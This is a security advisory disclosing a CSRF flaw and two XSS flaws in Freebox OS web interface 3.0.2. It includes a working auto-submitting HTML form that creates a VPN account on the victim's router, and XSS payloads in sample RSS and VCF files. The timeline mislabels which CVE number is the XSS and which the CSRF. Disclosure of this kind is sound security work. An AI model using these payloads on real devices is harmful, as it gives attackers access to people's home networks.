Freebox OS Web interface 3.0.2 XSS, CSRF


Hello list, Here are two CVEs I reported to Freebox, a french ISP: - CVE-2014-9382 - CSRF in VPN user account creation - CVE-2014-9405 - XSS Vulnerable product: Freebox OS Web interface 3.0.2. CVE-2014-9382 - CSRF in Freebox OS Web interface 3.0.2 allowing VPN user account creation ==================== Risk level: High Freebox allows users to create VPN connections to their home network. In version 3.0.2 when a new user is created, the following JSON request is sent to http://mafreebox.free.fr/api/v3/vpn/user/: {"login":"foo","password_set":false,"ip_reservation":"","password":"bar"} This request is vulnerable to CSRF which is easy to trigger. The following POC would create a new VPN account "ngocdh" / "1234=5678": <html> <body onload=vpn.submit()> <form name="vpn" action="http://mafreebox.free.fr/api/v3/vpn/user/" method="POST" enctype="text/plain"> <input type="hidden" name="{"login":"ngocdh","password_set":false,"ip_reservation":"","password":"1234" value="5678"}" /> <input type="submit" value="Submit request" /> </form> </body> </html> CVE-2014-9405 - XSS in Freebox OS Web interface 3.0.2 ==================== Risk level: low Two XSS instances with low probability of exploitation were found in the following places: - Download RSS - Contacts The following POC demonstrates the XSS in the "description" field of a Download RSS item: <rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"> <channel> <title>From Huy Ngoc</title> <description>huyngocbk@gmail.com</description> <link>http://google.com</link> <atom:link rel="hub" href="http://google.com"/> <atom:link rel="self" href="http://google.com"/> <item> <title>Test by huyngoc</title><description><![CDATA[<img src=/ onerror="alert(document.domain)">]]></description> <pubDate>Wed, 19 <b>Nov 2014</b> 20:36:47 UTC</pubDate> <guid>http://google.com></guid> </item> </channel> </rss> In order to exploit this XSS, the attacker must control a RSS feed to which a user have subscribed. The following VCF file demonstrates a XSS exploitation POC, "alert(document.domain)" would be called after importing this VCF file from the web interface: BEGIN:VCARD VERSION:3.0 FN:DAU Huy Ngoc N:;;;; URL:<img src=/ onerror='alert(document.domain);'> END:VCARD In order to exploit this XSS, the attacker must trick a user into importing his malicious .vcf. Timeline: 21/11/2014: XSS CVE-2014-9382 is reported to vendor 21/11/2014: vendor confirmed the vulnerability 02/12/2014: CSRF CVE-2014-9405 is reported to vendor 06/12/2014: a hot fix is released (http://dev.freebox.fr/blog/?p=1867) Credit: DAU Huy Ngoc (@ngocdh)